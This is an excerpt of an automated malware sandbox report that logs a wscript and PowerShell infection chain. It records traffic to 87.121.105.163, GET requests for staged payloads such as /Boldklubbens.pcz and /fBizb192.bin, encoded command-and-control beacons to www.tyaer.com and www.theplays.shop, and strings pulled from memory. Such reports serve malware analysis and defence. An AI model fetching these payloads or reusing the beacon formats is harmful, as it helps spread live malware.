        Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: global trafficHTTP traffic detected: GET /Boldklubbens.pcz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /fBizb192.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /gnbc/?ALLPg=JbKtchOp7P4H8n8&qRm=L9JeOsoYfW7LuiHbEVFIUxrrDEUMATYC8gDNcZo86ZNgoJ0Ky4PaH7PNod07P46PC5yTK57EcxKk26T8ts7darwqgM7ePv0Xp25EyyEytypCDy9EhkfmkBo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeHost: www.tyaer.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /gnbc/?qRm=CFA+HkVxdb5EmOTiyKOWRwF+pLrZo+HX//sAjaoe71zU1jru2C8H4zHuCGW9CrkOmabuxLOltM6mSwZ40cUWhJKDDEbSgCXb2jOP4Eqmg9UuBFGRNSISgVk=&ALLPg=JbKtchOp7P4H8n8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeHost: www.theplays.shopUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
        Source: unknownDNS traffic detected: queries for: www.tyaer.com
        Source: unknownHTTP traffic detected: POST /gnbc/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,enContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 200Cache-Control: no-cacheHost: www.theplays.shopOrigin: http://www.theplays.shopReferer: http://www.theplays.shop/gnbc/User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4Data Raw: 71 52 6d 3d 50 48 6f 65 45 53 6c 53 62 5a 64 4c 6c 4d 4b 53 68 4b 4b 35 54 67 5a 78 34 35 72 41 6d 4d 4c 54 2b 49 38 48 6c 38 30 36 72 48 2b 52 67 7a 62 68 6e 6e 31 53 2b 54 37 4b 43 69 43 37 41 72 74 2f 69 35 6e 56 32 75 75 6c 67 38 50 38 66 58 74 36 32 4d 63 57 71 71 57 6e 43 78 6a 76 6f 53 48 39 78 79 2f 4f 70 52 65 57 31 63 49 79 4b 30 66 74 54 79 4a 4f 32 41 78 44 70 75 6f 4c 33 2f 57 7a 2f 67 51 55 61 66 71 75 74 65 36 75 6c 37 71 42 5a 33 76 30 33 55 49 2f 41 4f 65 61 4d 75 6c 59 43 35 6c 68 55 49 50 4e 54 44 34 7a 54 2b 44 34 38 58 69 4e 65 48 62 33 57 35 35 75 74 79 44 71 2b 77 3d 3d Data Ascii: qRm=PHoeESlSbZdLlMKShKK5TgZx45rAmMLT+I8Hl806rH+Rgzbhnn1S+T7KCiC7Art/i5nV2uulg8P8fXt62McWqqWnCxjvoSH9xy/OpReW1cIyK0ftTyJO2AxDpuoL3/Wz/gQUafqute6ul7qBZ3v03UI/AOeaMulYC5lhUIPNTD4zT+D48XiNeHb3W55utyDq+w==
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 24 Apr 2024 04:36:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2BA0FEF1E5AA6121301DBF60C07D7CEA828F428FCA088EEE669E91D2D400Set-Cookie: _csrf=7ddec6786ae3cb344638a5e1242c3c4c39c215fe3ee247f1bfed6524e6db02b7a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22GhG2r_86DDM_NqV6QBWP1TkH6JUUXdl0%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 42 59 59 5f 5f 71 41 6c 51 45 67 4d 70 38 65 71 42 35 61 42 69 50 49 5a 69 45 4f 59 53 76 75 55 59 6e 69 56 75 4f 46 37 4f 79 5a 43 37 6e 6a 4d 30 6e 70 34 66 6b 6a 6a 69 76 56 4a 35 39 65 2d 6f 31 76 66 45 36 6b 65 6b 4e 78 55 4d 73 44 74 75 52 39 58 46 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 04:36:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cgG%2BOnfjbAoKEpMRYh3VkV%2FYY3YhN4JCPp1MLtGWEip4LLgzBsjlVa5RDdpy8yo%2FG4uh6DavyYgkDaBbYqsaNsjNHCroyp36YbR5qvltkIV%2F1QhUM4lN%2F9DIbT0r5a%2BOZJOjRw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87936527fbc22f71-LAXContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 04:36:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ofe31mBf41hu5IX7e4bsU54wxBikVFd%2FFmcl5VjIPx1Fu1HJLkiD49UEd4WfzYgRKVHMBh78aZoqXvPpB7W2zMi1boowdrzcLPtLtXDRz%2B4bn6UmrTwKfXkAJgw9dIPFPK8%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87936538afca7d12-LAXContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 04:37:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cO6%2BByCrKRvGkrIirXx3ZXp6Sns0xVhCt8yvmVH%2FT5pSdZJFcwSQYTfEzrKk7Unbb6uiCJqtaY%2F0rGoCZ6ECa0z30Ix4kTG4J%2FbC6T7P6kf4rAt3x%2ButIobRKiHDtmFhQXQNfQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 879365497e6a2b8d-LAXContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 04:37:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DYZ9TiDcQtzlhfExeY4sq60KwRDjErW4%2FzGWPaU6WoyRekODs52%2FRy77MEWTK71TvrSANNB1XQm008yy7DmXD2ZF6D%2Fr%2BPZpzdiSBQ6feAS1jTbJx920u5YYGyDPH63ELNiS8A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8793655a483fdba2-LAXalt-svc: h3=":443"; ma=86400Data Raw: 34 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 Data Ascii: 448<!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height:
        Source: powershell.exe, 00000001.00000002.2117543638.0000024A8040B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2117543638.0000024A81E92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163
        Source: powershell.exe, 00000001.00000002.2117543638.0000024A80224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Boldklubbens.pczP
        Source: powershell.exe, 00000004.00000002.2000284208.0000000005145000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Boldklubbens.pczXRvl
        Source: powershell.exe, 00000001.00000002.2117543638.0000024A82048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.H
        Source: wscript.exe, 00000000.00000003.1653614404.00000279AEFA3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652928103.00000279AEFA3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653665451.00000279AEFA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/cps.html0
        Source: wscript.exe, 00000000.00000003.1653614404.00000279AEFA3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652928103.00000279AEFA3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653665451.00000279AEFA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/last.crl0G
        Source: wscript.exe, 00000000.00000003.1653177020.00000279AD0D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acedicom.edicomgroup.com/doc0
        Source: wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
        Source: wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
        Source: wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
        Source: wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv10.crl0
        Source: wscript.exe, 00000000.00000003.1653057324.00000279AEF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
        Source: wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
        Source: wscript.exe, 00000000.00000003.1652756546.00000279AF063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
        Source: wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
        Source: wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
        Source: wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
        Source: wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/ocsp0
        Source: wscript.exe, 00000000.00000003.1652963346.00000279AEF76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
        Source: wscript.exe, 00000000.00000003.1652928103.00000279AEF7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
        Source: wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
        Source: wscript.exe, 00000000.00000003.1652842936.00000279AEF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
